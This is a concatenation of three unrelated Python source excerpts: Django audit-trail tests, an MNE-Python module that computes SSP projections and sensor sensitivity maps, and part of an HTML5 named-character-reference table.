'old_value': None,
'old_value_string': None,
'new_value': 'a',
'new_value_string': 'a',
'field_label': 'Char',
'field_name': 'char',
}
})
def test_queryset_get_related_changes(self):
"""
1. Create post
2. Create comment 1
3. Create comment 2
--- Testing changes
4. Delete comment 1
5. Change comment 3
6. Create comment 3
"""
author = User.objects.create()
post = Post.objects.create(author=author)
comment1 = Comment.objects.create(post=post, text='comment 1 text')
comment2 = Comment.objects.create(post=post, text='comment 2 text')
time_from = datetime.datetime.now()
comment1.delete()
comment2.text = 'comment 2 text change'
comment2.save()
comment3 = Comment.objects.create(post=post, text='comment 3 text')
# Do not display created and deleted object during period
comment4 = Comment.objects.create(post=post, text='comment 3 text')
comment4.delete()
trails = audit_trail.get_for_object(post).filter(action_time__gt=time_from).order_by()
related_objects_changes = trails.get_related_changes()
self.assertEqual(len(related_objects_changes), 3)
comment1_changes = related_objects_changes[0]
self.assertEqual(comment1_changes['representation'], 'Comment 1')
self.assertEqual(comment1_changes['action'], 'Deleted')
self.assertEqual(comment1_changes['model'], 'test_app.comment')
self.assertEqual(comment1_changes['changes']['text'], {
'old_value': u'comment 1 text',
'old_value_string': u'comment 1 text',
'new_value': None,
'new_value_string': None,
'field_name': 'text',
'field_label': u'Text'
})
comment2_changes = related_objects_changes[1]
self.assertEqual(comment2_changes['representation'], 'Comment 2')
self.assertEqual(comment2_changes['action'], 'Updated')
self.assertEqual(comment1_changes['model'], 'test_app.comment')
self.assertEqual(comment2_changes['changes']['text'], {
'field_label': u'Text',
'new_value': u'comment 2 text change',
'new_value_string': u'comment 2 text change',
'old_value': u'comment 2 text',
'old_value_string': u'comment 2 text',
'field_name': 'text',
})
comment3_changes = related_objects_changes[2]
self.assertEqual(comment3_changes['representation'], 'Comment 3')
self.assertEqual(comment3_changes['action'], 'Created')
self.assertEqual(comment1_changes['model'], 'test_app.comment')
self.assertEqual(comment3_changes['changes']['text'], {
'old_value': None,
'old_value_string': None,
'new_value': u'comment 3 text',
'new_value_string': u'comment 3 text',
'field_label': u'Text',
'field_name': 'text'
})
def test_related_object_change(self):
dog = Animal.objects.create(name='Dog')
snake = Animal.objects.create(name='Snake')
man = Person.objects.create()
man.pet = dog
man.save()
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'pet': {
'old_value': None,
'old_value_string': None,
'new_value': unicode(dog.id),
'new_value_string': unicode(dog),
'field_label': u'Pet'
}
})
man.pet = snake
man.save()
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'pet': {
'old_value': unicode(dog.id),
'old_value_string': unicode(dog),
'new_value': unicode(snake.id),
'new_value_string': unicode(snake),
'field_label': u'Pet'
}
})
man.pet = None
man.save()
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'pet': {
'old_value': unicode(snake.id),
'old_value_string': unicode(snake),
'new_value': None,
'new_value_string': None,
'field_label': u'Pet'
}
})
def test_values_with_choices(self):
person = SomePerson.objects.create(season="1")
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
self.assertEqual(trail.get_changes()['season'], {
'new_value_string': 'Spring',
'new_value': '1',
'old_value_string': 'Winter',
'old_value': '0',
'field_label': 'Season'
})
|
|
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
#
# License: BSD (3-clause)
import numpy as np
from scipy import linalg
from . import io, Epochs
from .utils import check_fname, logger, verbose
from .io.pick import pick_types, pick_types_forward
from .io.proj import Projection, _has_eeg_average_ref_proj
from .event import make_fixed_length_events
from .parallel import parallel_func
from .cov import _check_n_samples
from .forward import (is_fixed_orient, _subject_from_forward,
convert_forward_solution)
from .source_estimate import SourceEstimate, VolSourceEstimate
from .io.proj import make_projector, make_eeg_average_ref_proj
def read_proj(fname):
"""Read projections from a FIF file.
Parameters
----------
fname : string
The name of file containing the projections vectors. It should end with
-proj.fif or -proj.fif.gz.
Returns
-------
projs : list
The list of projection vectors.
See Also
--------
write_proj
"""
check_fname(fname, 'projection', ('-proj.fif', '-proj.fif.gz'))
ff, tree, _ = io.fiff_open(fname)
with ff as fid:
projs = io.proj._read_proj(fid, tree)
return projs
def write_proj(fname, projs):
"""Write projections to a FIF file.
Parameters
----------
fname : string
The name of file containing the projections vectors. It should end with
-proj.fif or -proj.fif.gz.
projs : list
The list of projection vectors.
See Also
--------
read_proj
"""
check_fname(fname, 'projection', ('-proj.fif', '-proj.fif.gz'))
fid = io.write.start_file(fname)
io.proj._write_proj(fid, projs)
io.write.end_file(fid)
@verbose
def _compute_proj(data, info, n_grad, n_mag, n_eeg, desc_prefix, verbose=None):
mag_ind = pick_types(info, meg='mag', ref_meg=False, exclude='bads')
grad_ind = pick_types(info, meg='grad', ref_meg=False, exclude='bads')
eeg_ind = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude='bads')
if (n_grad > 0) and len(grad_ind) == 0:
logger.info("No gradiometers found. Forcing n_grad to 0")
n_grad = 0
if (n_mag > 0) and len(mag_ind) == 0:
logger.info("No magnetometers found. Forcing n_mag to 0")
n_mag = 0
if (n_eeg > 0) and len(eeg_ind) == 0:
logger.info("No EEG channels found. Forcing n_eeg to 0")
n_eeg = 0
ch_names = info['ch_names']
grad_names, mag_names, eeg_names = ([ch_names[k] for k in ind]
for ind in [grad_ind, mag_ind,
eeg_ind])
projs = []
for n, ind, names, desc in zip([n_grad, n_mag, n_eeg],
[grad_ind, mag_ind, eeg_ind],
[grad_names, mag_names, eeg_names],
['planar', 'axial', 'eeg']):
if n == 0:
continue
data_ind = data[ind][:, ind]
# data is the covariance matrix: U * S**2 * Ut
U, Sexp2, _ = linalg.svd(data_ind, full_matrices=False,
overwrite_a=True)
U = U[:, :n]
exp_var = Sexp2 / Sexp2.sum()
exp_var = exp_var[:n]
for k, (u, var) in enumerate(zip(U.T, exp_var)):
proj_data = dict(col_names=names, row_names=None,
data=u[np.newaxis, :], nrow=1, ncol=u.size)
this_desc = "%s-%s-PCA-%02d" % (desc, desc_prefix, k + 1)
logger.info("Adding projection: %s" % this_desc)
proj = Projection(active=False, data=proj_data,
desc=this_desc, kind=1, explained_var=var)
projs.append(proj)
return projs
@verbose
def compute_proj_epochs(epochs, n_grad=2, n_mag=2, n_eeg=2, n_jobs=1,
desc_prefix=None, verbose=None):
"""Compute SSP (spatial space projection) vectors on Epochs
Parameters
----------
epochs : instance of Epochs
The epochs containing the artifact
n_grad : int
Number of vectors for gradiometers
n_mag : int
Number of vectors for magnetometers
n_eeg : int
Number of vectors for EEG channels
n_jobs : int
Number of jobs to use to compute covariance
desc_prefix : str | None
The description prefix to use. If None, one will be created based on
the event_id, tmin, and tmax.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
projs: list
List of projection vectors
See Also
--------
compute_proj_raw, compute_proj_evoked
"""
# compute data covariance
data = _compute_cov_epochs(epochs, n_jobs)
event_id = epochs.event_id
if event_id is None or len(list(event_id.keys())) == 0:
event_id = '0'
elif len(event_id.keys()) == 1:
event_id = str(list(event_id.values())[0])
else:
event_id = 'Multiple-events'
if desc_prefix is None:
desc_prefix = "%s-%-.3f-%-.3f" % (event_id, epochs.tmin, epochs.tmax)
return _compute_proj(data, epochs.info, n_grad, n_mag, n_eeg, desc_prefix)
def _compute_cov_epochs(epochs, n_jobs):
"""Helper function for computing epochs covariance"""
parallel, p_fun, _ = parallel_func(np.dot, n_jobs)
data = parallel(p_fun(e, e.T) for e in epochs)
n_epochs = len(data)
if n_epochs == 0:
raise RuntimeError('No good epochs found')
n_chan, n_samples = epochs.info['nchan'], len(epochs.times)
_check_n_samples(n_samples * n_epochs, n_chan)
data = sum(data)
return data
@verbose
def compute_proj_evoked(evoked, n_grad=2, n_mag=2, n_eeg=2, verbose=None):
"""Compute SSP (spatial space projection) vectors on Evoked
Parameters
----------
evoked : instance of Evoked
The Evoked obtained by averaging the artifact
n_grad : int
Number of vectors for gradiometers
n_mag : int
Number of vectors for magnetometers
n_eeg : int
Number of vectors for EEG channels
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
projs : list
List of projection vectors
See Also
--------
compute_proj_raw, compute_proj_epochs
"""
data = np.dot(evoked.data, evoked.data.T) # compute data covariance
desc_prefix = "%-.3f-%-.3f" % (evoked.times[0], evoked.times[-1])
return _compute_proj(data, evoked.info, n_grad, n_mag, n_eeg, desc_prefix)
@verbose
def compute_proj_raw(raw, start=0, stop=None, duration=1, n_grad=2, n_mag=2,
n_eeg=0, reject=None, flat=None, n_jobs=1, verbose=None):
"""Compute SSP (spatial space projection) vectors on Raw
Parameters
----------
raw : instance of Raw
A raw object to use the data from.
start : float
Time (in sec) to start computing SSP.
stop : float
Time (in sec) to stop computing SSP.
None will go to the end of the file.
duration : float
Duration (in sec) to chunk data into for SSP
If duration is None, data will not be chunked.
n_grad : int
Number of vectors for gradiometers.
n_mag : int
Number of vectors for magnetometers.
n_eeg : int
Number of vectors for EEG channels.
reject : dict | None
Epoch rejection configuration (see Epochs).
flat : dict | None
Epoch flat configuration (see Epochs).
n_jobs : int
Number of jobs to use to compute covariance.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
projs: list
List of projection vectors
See Also
--------
compute_proj_epochs, compute_proj_evoked
"""
if duration is not None:
events = make_fixed_length_events(raw, 999, start, stop, duration)
epochs = Epochs(raw, events, None, tmin=0., tmax=duration,
picks=pick_types(raw.info, meg=True, eeg=True,
eog=True, ecg=True, emg=True,
exclude='bads'),
reject=reject, flat=flat, add_eeg_ref=False)
data = _compute_cov_epochs(epochs, n_jobs)
info = epochs.info
if not stop:
stop = raw.n_times / raw.info['sfreq']
else:
# convert to sample indices
start = max(raw.time_as_index(start)[0], 0)
stop = raw.time_as_index(stop)[0] if stop else raw.n_times
stop = min(stop, raw.n_times)
data, times = raw[:, start:stop]
_check_n_samples(stop - start, data.shape[0])
data = np.dot(data, data.T) # compute data covariance
info = raw.info
# convert back to times
start = start / raw.info['sfreq']
stop = stop / raw.info['sfreq']
desc_prefix = "Raw-%-.3f-%-.3f" % (start, stop)
projs = _compute_proj(data, info, n_grad, n_mag, n_eeg, desc_prefix)
return projs
def sensitivity_map(fwd, projs=None, ch_type='grad', mode='fixed', exclude=[],
verbose=None):
"""Compute sensitivity map
Such maps are used to know how much sources are visible by a type
of sensor, and how much projections shadow some sources.
Parameters
----------
fwd : Forward
The forward operator.
projs : list
List of projection vectors.
ch_type : 'grad' | 'mag' | 'eeg'
The type of sensors to use.
mode : str
The type of sensitivity map computed. See manual. Should be 'free',
'fixed', 'ratio', 'radiality', 'angle', 'remaining', or 'dampening'
corresponding to the argument --map 1, 2, 3, 4, 5, 6 and 7 of the
command mne_sensitivity_map.
exclude : list of string | str
List of channels to exclude. If empty do not exclude any (default).
If 'bads', exclude channels in fwd['info']['bads'].
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
stc : SourceEstimate | VolSourceEstimate
The sensitivity map as a SourceEstimate or VolSourceEstimate instance
for visualization.
"""
# check strings
if ch_type not in ['eeg', 'grad', 'mag']:
raise ValueError("ch_type should be 'eeg', 'mag' or 'grad (got %s)"
% ch_type)
if mode not in ['free', 'fixed', 'ratio', 'radiality', 'angle',
'remaining', 'dampening']:
raise ValueError('Unknown mode type (got %s)' % mode)
# check forward
if is_fixed_orient(fwd, orig=True):
raise ValueError('fwd should must be computed with free orientation')
# limit forward (this will make a copy of the data for us)
if ch_type == 'eeg':
fwd = pick_types_forward(fwd, meg=False, eeg=True, exclude=exclude)
else:
fwd = pick_types_forward(fwd, meg=ch_type, eeg=False, exclude=exclude)
convert_forward_solution(fwd, surf_ori=True, force_fixed=False,
copy=False, verbose=False)
if not fwd['surf_ori'] or is_fixed_orient(fwd):
raise RuntimeError('Error converting solution, please notify '
'mne-python developers')
gain = fwd['sol']['data']
# Make sure EEG has average
if ch_type == 'eeg':
if projs is None or not _has_eeg_average_ref_proj(projs):
eeg_ave = [make_eeg_average_ref_proj(fwd['info'])]
else:
eeg_ave = []
projs = eeg_ave if projs is None else projs + eeg_ave
# Construct the projector
residual_types = ['angle', 'remaining', 'dampening']
if projs is not None:
proj, ncomp, U = make_projector(projs, fwd['sol']['row_names'],
include_active=True)
# do projection for most types
if mode not in residual_types:
gain = np.dot(proj, gain)
elif ncomp == 0:
raise RuntimeError('No valid projectors found for channel type '
'%s, cannot compute %s' % (ch_type, mode))
# can only run the last couple methods if there are projectors
elif mode in residual_types:
raise ValueError('No projectors used, cannot compute %s' % mode)
n_sensors, n_dipoles = gain.shape
n_locations = n_dipoles // 3
sensitivity_map = np.empty(n_locations)
for k in range(n_locations):
gg = gain[:, 3 * k:3 * (k + 1)]
if mode != 'fixed':
s = linalg.svd(gg, full_matrices=False, compute_uv=False)
if mode == 'free':
sensitivity_map[k] = s[0]
else:
gz = linalg.norm(gg[:, 2]) # the normal component
if mode == 'fixed':
sensitivity_map[k] = gz
elif mode == 'ratio':
sensitivity_map[k] = gz / s[0]
elif mode == 'radiality':
sensitivity_map[k] = 1. - (gz / s[0])
else:
if mode == 'angle':
co = linalg.norm(np.dot(gg[:, 2], U))
sensitivity_map[k] = co / gz
else:
p = linalg.norm(np.dot(proj, gg[:, 2]))
if mode == 'remaining':
sensitivity_map[k] = p / gz
elif mode == 'dampening':
sensitivity_map[k] = 1. - p / gz
else:
raise ValueError('Unknown mode type (got %s)' % mode)
# only normalize fixed and free methods
if mode in ['fixed', 'free']:
sensitivity_map /= np.max(sensitivity_map)
subject = _subject_from_forward(fwd)
if fwd['src'][0]['type'] == 'vol': # volume source space
vertices = fwd['src'][0]['vertno']
SEClass = VolSourceEstimate
else:
vertices = [fwd['src'][0]['vertno'], fwd['src'][1]['vertno']]
SEClass = SourceEstimate
stc = SEClass(sensitivity_map[:, np.newaxis], vertices=vertices, tmin=0,
tstep=1, subject=subject)
return stc
|
|
# -*- coding: ascii -*- pylint: disable = too-many-lines
r"""
:Copyright:
Copyright 2012 - 2015
Andr\xe9 Malo or his licensors, as applicable
:License:
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==================================
HTML5 named character references
==================================
HTML5 named character references.
"""
if __doc__: # pragma: no cover
# pylint: disable = redefined-builtin
__doc__ = __doc__.encode('ascii').decode('unicode_escape')
__author__ = r"Andr\xe9 Malo".encode('ascii').decode('unicode_escape')
__docformat__ = "restructuredtext en"
#: HTML named character references, generated from
#: `the HTML5 spec`_\.
#:
#: .. _the HTML5 spec: http://www.w3.org/TR/html5/
#: syntax.html#named-character-references
#:
#: :Type: ``dict``
htmlentities = {
u'Aacute': u'\xc1',
u'aacute': u'\xe1',
u'Abreve': u'\u0102',
u'abreve': u'\u0103',
u'ac': u'\u223e',
u'acd': u'\u223f',
u'acE': u'\u223e\u0333',
u'Acirc': u'\xc2',
u'acirc': u'\xe2',
u'acute': u'\xb4',
u'Acy': u'\u0410',
u'acy': u'\u0430',
u'AElig': u'\xc6',
u'aelig': u'\xe6',
u'af': u'\u2061',
u'Afr': '5\xd8\x04\xdd'.decode("utf-16-le"),
u'afr': '5\xd8\x1e\xdd'.decode("utf-16-le"),
u'Agrave': u'\xc0',
u'agrave': u'\xe0',
u'alefsym': u'\u2135',
u'aleph': u'\u2135',
u'Alpha': u'\u0391',
u'alpha': u'\u03b1',
u'Amacr': u'\u0100',
u'amacr': u'\u0101',
u'amalg': u'\u2a3f',
u'AMP': u'&',
u'amp': u'&',
u'And': u'\u2a53',
u'and': u'\u2227',
u'andand': u'\u2a55',
u'andd': u'\u2a5c',
u'andslope': u'\u2a58',
u'andv': u'\u2a5a',
u'ang': u'\u2220',
u'ange': u'\u29a4',
u'angle': u'\u2220',
u'angmsd': u'\u2221',
u'angmsdaa': u'\u29a8',
u'angmsdab': u'\u29a9',
u'angmsdac': u'\u29aa',
u'angmsdad': u'\u29ab',
u'angmsdae': u'\u29ac',
u'angmsdaf': u'\u29ad',
u'angmsdag': u'\u29ae',
u'angmsdah': u'\u29af',
u'angrt': u'\u221f',
u'angrtvb': u'\u22be',
u'angrtvbd': u'\u299d',
u'angsph': u'\u2222',
u'angst': u'\xc5',
u'angzarr': u'\u237c',
u'Aogon': u'\u0104',
u'aogon': u'\u0105',
u'Aopf': '5\xd88\xdd'.decode("utf-16-le"),
u'aopf': '5\xd8R\xdd'.decode("utf-16-le"),
u'ap': u'\u2248',
u'apacir': u'\u2a6f',
u'apE': u'\u2a70',
u'ape': u'\u224a',
u'apid': u'\u224b',
u'apos': u'\'',
u'ApplyFunction': u'\u2061',
u'approx': u'\u2248',
u'approxeq': u'\u224a',
u'Aring': u'\xc5',
u'aring': u'\xe5',
u'Ascr': '5\xd8\x9c\xdc'.decode("utf-16-le"),
u'ascr': '5\xd8\xb6\xdc'.decode("utf-16-le"),
u'Assign': u'\u2254',
u'ast': u'*',
u'asymp': u'\u2248',
u'asympeq': u'\u224d',
u'Atilde': u'\xc3',
u'atilde': u'\xe3',
u'Auml': u'\xc4',
u'auml': u'\xe4',
u'awconint': u'\u2233',
u'awint': u'\u2a11',
u'backcong': u'\u224c',
u'backepsilon': u'\u03f6',
u'backprime': u'\u2035',
u'backsim': u'\u223d',
u'backsimeq': u'\u22cd',
u'Backslash': u'\u2216',
u'Barv': u'\u2ae7',
u'barvee': u'\u22bd',
u'Barwed': u'\u2306',
u'barwed': u'\u2305',
u'barwedge': u'\u2305',
u'bbrk': u'\u23b5',
u'bbrktbrk': u'\u23b6',
u'bcong': u'\u224c',
u'Bcy': u'\u0411',
u'bcy': u'\u0431',
u'bdquo': u'\u201e',
u'becaus': u'\u2235',
u'Because': u'\u2235',
u'because': u'\u2235',
u'bemptyv': u'\u29b0',
u'bepsi': u'\u03f6',
u'bernou': u'\u212c',
u'Bernoullis': u'\u212c',
u'Beta': u'\u0392',
u'beta': u'\u03b2',
u'beth': u'\u2136',
u'between': u'\u226c',
u'Bfr': '5\xd8\x05\xdd'.decode("utf-16-le"),
u'bfr': '5\xd8\x1f\xdd'.decode("utf-16-le"),
u'bigcap': u'\u22c2',
u'bigcirc': u'\u25ef',
u'bigcup': u'\u22c3',
u'bigodot': u'\u2a00',
u'bigoplus': u'\u2a01',
u'bigotimes': u'\u2a02',
u'bigsqcup': u'\u2a06',
u'bigstar': u'\u2605',
u'bigtriangledown': u'\u25bd',
u'bigtriangleup': u'\u25b3',
u'biguplus': u'\u2a04',
u'bigvee': u'\u22c1',
u'bigwedge': u'\u22c0',
u'bkarow': u'\u290d',
u'blacklozenge': u'\u29eb',
u'blacksquare': u'\u25aa',
u'blacktriangle': u'\u25b4',
u'blacktriangledown': u'\u25be',
u'blacktriangleleft': u'\u25c2',
u'blacktriangleright': u'\u25b8',
u'blank': u'\u2423',
u'blk12': u'\u2592',
u'blk14': u'\u2591',
u'blk34': u'\u2593',
u'block': u'\u2588',
u'bne': u'=\u20e5',
u'bnequiv': u'\u2261\u20e5',
u'bNot': u'\u2aed',
u'bnot': u'\u2310',
u'Bopf': '5\xd89\xdd'.decode("utf-16-le"),
u'bopf': '5\xd8S\xdd'.decode("utf-16-le"),
u'bot': u'\u22a5',
u'bottom': u'\u22a5',
u'bowtie': u'\u22c8',
u'boxbox': u'\u29c9',
u'boxDL': u'\u2557',
u'boxDl': u'\u2556',
u'boxdL': u'\u2555',
u'boxdl': u'\u2510',
u'boxDR': u'\u2554',
u'boxDr': u'\u2553',
u'boxdR': u'\u2552',
u'boxdr': u'\u250c',
u'boxH': u'\u2550',
u'boxh': u'\u2500',
u'boxHD': u'\u2566',
u'boxHd': u'\u2564',
u'boxhD': u'\u2565',
u'boxhd': u'\u252c',
u'boxHU': u'\u2569',
u'boxHu': u'\u2567',
u'boxhU': u'\u2568',
u'boxhu': u'\u2534',
u'boxminus': u'\u229f',
u'boxplus': u'\u229e',
u'boxtimes': u'\u22a0',
u'boxUL': u'\u255d',
u'boxUl': u'\u255c',
u'boxuL': u'\u255b',
u'boxul': u'\u2518',
u'boxUR': u'\u255a',
u'boxUr': u'\u2559',
u'boxuR': u'\u2558',
u'boxur': u'\u2514',
u'boxV': u'\u2551',
u'boxv': u'\u2502',
u'boxVH': u'\u256c',
u'boxVh': u'\u256b',
u'boxvH': u'\u256a',
u'boxvh': u'\u253c',
u'boxVL': u'\u2563',
u'boxVl': u'\u2562',
u'boxvL': u'\u2561',
u'boxvl': u'\u2524',
u'boxVR': u'\u2560',
u'boxVr': u'\u255f',
u'boxvR': u'\u255e',
u'boxvr': u'\u251c',
u'bprime': u'\u2035',
u'Breve': u'\u02d8',
u'breve': u'\u02d8',
u'brvbar': u'\xa6',
u'Bscr': u'\u212c',
u'bscr': '5\xd8\xb7\xdc'.decode("utf-16-le"),
u'bsemi': u'\u204f',
u'bsim': u'\u223d',
u'bsime': u'\u22cd',
u'bsol': u'\\',
u'bsolb': u'\u29c5',
u'bsolhsub': u'\u27c8',
u'bull': u'\u2022',
u'bullet': u'\u2022',
u'bump': u'\u224e',
u'bumpE': u'\u2aae',
u'bumpe': u'\u224f',
u'Bumpeq': u'\u224e',
u'bumpeq': u'\u224f',
u'Cacute': u'\u0106',
u'cacute': u'\u0107',
u'Cap': u'\u22d2',
u'cap': u'\u2229',
u'capand': u'\u2a44',
u'capbrcup': u'\u2a49',
u'capcap': u'\u2a4b',
u'capcup': u'\u2a47',
u'capdot': u'\u2a40',
u'CapitalDifferentialD': u'\u2145',
u'caps': u'\u2229\ufe00',
u'caret': u'\u2041',
u'caron': u'\u02c7',
u'Cayleys': u'\u212d',
u'ccaps': u'\u2a4d',
u'Ccaron': u'\u010c',
u'ccaron': u'\u010d',
u'Ccedil': u'\xc7',
u'ccedil': u'\xe7',
u'Ccirc': u'\u0108',
u'ccirc': u'\u0109',
u'Cconint': u'\u2230',
u'ccups': u'\u2a4c',
u'ccupssm': u'\u2a50',
u'Cdot': u'\u010a',
u'cdot': u'\u010b',
u'cedil': u'\xb8',
u'Cedilla': u'\xb8',
u'cemptyv': u'\u29b2',
u'cent': u'\xa2',
u'CenterDot': u'\xb7',
u'centerdot': u'\xb7',
u'Cfr': u'\u212d',
u'cfr': '5\xd8 \xdd'.decode("utf-16-le"),
u'CHcy': u'\u0427',
u'chcy': u'\u0447',
u'check': u'\u2713',
u'checkmark': u'\u2713',
u'Chi': u'\u03a7',
u'chi': u'\u03c7',
u'cir': u'\u25cb',
u'circ': u'\u02c6',
u'circeq': u'\u2257',
u'circlearrowleft': u'\u21ba',
u'circlearrowright': u'\u21bb',
u'circledast': u'\u229b',
u'circledcirc': u'\u229a',
u'circleddash': u'\u229d',
u'CircleDot': u'\u2299',
u'circledR': u'\xae',
u'circledS': u'\u24c8',
u'CircleMinus': u'\u2296',
u'CirclePlus': u'\u2295',
u'CircleTimes': u'\u2297',
u'cirE': u'\u29c3',
u'cire': u'\u2257',
u'cirfnint': u'\u2a10',
u'cirmid': u'\u2aef',
u'cirscir': u'\u29c2',
u'ClockwiseContourIntegral': u'\u2232',
u'CloseCurlyDoubleQuote': u'\u201d',
u'CloseCurlyQuote': u'\u2019',
u'clubs': u'\u2663',
u'clubsuit': u'\u2663',
u'Colon': u'\u2237',
u'colon': u':',
u'Colone': u'\u2a74',
u'colone': u'\u2254',
u'coloneq': u'\u2254',
u'comma': u',',
u'commat': u'@',
u'comp': u'\u2201',
u'compfn': u'\u2218',
u'complement': u'\u2201',
u'complexes': u'\u2102',
u'cong': u'\u2245',
u'congdot': u'\u2a6d',
u'Congruent': u'\u2261',
u'Conint': u'\u222f',
u'conint': u'\u222e',
u'ContourIntegral': u'\u222e',
u'Copf': u'\u2102',
u'copf': '5\xd8T\xdd'.decode("utf-16-le"),
u'coprod': u'\u2210',
u'Coproduct': u'\u2210',
u'COPY': u'\xa9',
u'copy': u'\xa9',
u'copysr': u'\u2117',
u'CounterClockwiseContourIntegral': u'\u2233',
u'crarr': u'\u21b5',
u'Cross': u'\u2a2f',
u'cross': u'\u2717',
u'Cscr': '5\xd8\x9e\xdc'.decode("utf-16-le"),
u'cscr': '5\xd8\xb8\xdc'.decode("utf-16-le"),
u'csub': u'\u2acf',
u'csube': u'\u2ad1',
u'csup': u'\u2ad0',
u'csupe': u'\u2ad2',
u'ctdot': u'\u22ef',
u'cudarrl': u'\u2938',
u'cudarrr': u'\u2935',
u'cuepr': u'\u22de',
u'cuesc': u'\u22df',
u'cularr': u'\u21b6',
u'cularrp': u'\u293d',
u'Cup': u'\u22d3',
u'cup': u'\u222a',
u'cupbrcap': u'\u2a48',
u'CupCap': u'\u224d',
u'cupcap': u'\u2a46',
u'cupcup': u'\u2a4a',
u'cupdot': u'\u228d',
u'cupor': u'\u2a45',
u'cups': u'\u222a\ufe00',
u'curarr': u'\u21b7',
u'curarrm': u'\u293c',
u'curlyeqprec': u'\u22de',
u'curlyeqsucc': u'\u22df',
u'curlyvee': u'\u22ce',
u'curlywedge': u'\u22cf',
u'curren': u'\xa4',
u'curvearrowleft': u'\u21b6',
u'curvearrowright': u'\u21b7',
u'cuvee': u'\u22ce',
u'cuwed': u'\u22cf',
u'cwconint': u'\u2232',
u'cwint': u'\u2231',
u'cylcty': u'\u232d',
u'Dagger': u'\u2021',
u'dagger': u'\u2020',
u'daleth': u'\u2138',
u'Darr': u'\u21a1',
u'dArr': u'\u21d3',
u'darr': u'\u2193',
u'dash': u'\u2010',
u'Dashv': u'\u2ae4',
u'dashv': u'\u22a3',
u'dbkarow': u'\u290f',
u'dblac': u'\u02dd',
u'Dcaron': u'\u010e',
u'dcaron': u'\u010f',
u'Dcy': u'\u0414',
u'dcy': u'\u0434',
u'DD': u'\u2145',
u'dd': u'\u2146',
u'ddagger': u'\u2021',
u'ddarr': u'\u21ca',
u'DDotrahd': u'\u2911',
u'ddotseq': u'\u2a77',
u'deg': u'\xb0',
u'Del': u'\u2207',
u'Delta': u'\u0394',
u'delta': u'\u03b4',
u'demptyv': u'\u29b1',
u'dfisht': u'\u297f',
u'Dfr': '5\xd8\x07\xdd'.decode("utf-16-le"),
u'dfr': '5\xd8!\xdd'.decode("utf-16-le"),
u'dHar': u'\u2965',
u'dharl': u'\u21c3',
u'dharr': u'\u21c2',
u'DiacriticalAcute': u'\xb4',
u'DiacriticalDot': u'\u02d9',
u'DiacriticalDoubleAcute': u'\u02dd',
u'DiacriticalGrave': u'`',
u'DiacriticalTilde': u'\u02dc',
u'diam': u'\u22c4',
u'Diamond': u'\u22c4',
u'diamond': u'\u22c4',
u'diamondsuit': u'\u2666',
u'diams': u'\u2666',
u'die': u'\xa8',
u'DifferentialD': u'\u2146',
u'digamma': u'\u03dd',
u'disin': u'\u22f2',
u'div': u'\xf7',
u'divide': u'\xf7',
u'divideontimes': u'\u22c7',
u'divonx': u'\u22c7',
u'DJcy': u'\u0402',
u'djcy': u'\u0452',
u'dlcorn': u'\u231e',
u'dlcrop': u'\u230d',
u'dollar': u'$',
u'Dopf': '5\xd8;\xdd'.decode("utf-16-le"),
u'dopf': '5\xd8U\xdd'.decode("utf-16-le"),
u'Dot': u'\xa8',
u'dot': u'\u02d9',
u'DotDot': u'\u20dc',
u'doteq': u'\u2250',
u'doteqdot': u'\u2251',
u'DotEqual': u'\u2250',
u'dotminus': u'\u2238',
u'dotplus': u'\u2214',
u'dotsquare': u'\u22a1',
u'doublebarwedge': u'\u2306',
u'DoubleContourIntegral': u'\u222f',
u'DoubleDot': u'\xa8',
u'DoubleDownArrow': u'\u21d3',
u'DoubleLeftArrow': u'\u21d0',
u'DoubleLeftRightArrow': u'\u21d4',
u'DoubleLeftTee': u'\u2ae4',
u'DoubleLongLeftArrow': u'\u27f8',
u'DoubleLongLeftRightArrow': u'\u27fa',
u'DoubleLongRightArrow': u'\u27f9',
u'DoubleRightArrow': u'\u21d2',
u'DoubleRightTee': u'\u22a8',
u'DoubleUpArrow': u'\u21d1',
u'DoubleUpDownArrow': u'\u21d5',
u'DoubleVerticalBar': u'\u2225',
u'DownArrow': u'\u2193',
u'Downarrow': u'\u21d3',
u'downarrow': u'\u2193',
u'DownArrowBar': u'\u2913',
u'DownArrowUpArrow': u'\u21f5',
u'DownBreve': u'\u0311',
u'downdownarrows': u'\u21ca',
u'downharpoonleft': u'\u21c3',
u'downharpoonright': u'\u21c2',
u'DownLeftRightVector': u'\u2950',
u'DownLeftTeeVector': u'\u295e',
u'DownLeftVector': u'\u21bd',
u'DownLeftVectorBar': u'\u2956',
u'DownRightTeeVector': u'\u295f',
u'DownRightVector': u'\u21c1',
u'DownRightVectorBar': u'\u2957',
u'DownTee': u'\u22a4',
u'DownTeeArrow': u'\u21a7',
u'drbkarow': u'\u2910',
u'drcorn': u'\u231f',
u'drcrop': u'\u230c',
u'Dscr': '5\xd8\x9f\xdc'.decode("utf-16-le"),
u'dscr': '5\xd8\xb9\xdc'.decode("utf-16-le"),
u'DScy': u'\u0405',
u'dscy': u'\u0455',
u'dsol': u'\u29f6',
u'Dstrok': u'\u0110',
u'dstrok': u'\u0111',
u'dtdot': u'\u22f1',
u'dtri': u'\u25bf',
u'dtrif': u'\u25be',
u'duarr': u'\u21f5',
u'duhar': u'\u296f',
u'dwangle': u'\u29a6',
u'DZcy': u'\u040f',
u'dzcy': u'\u045f',
u'dzigrarr': u'\u27ff',
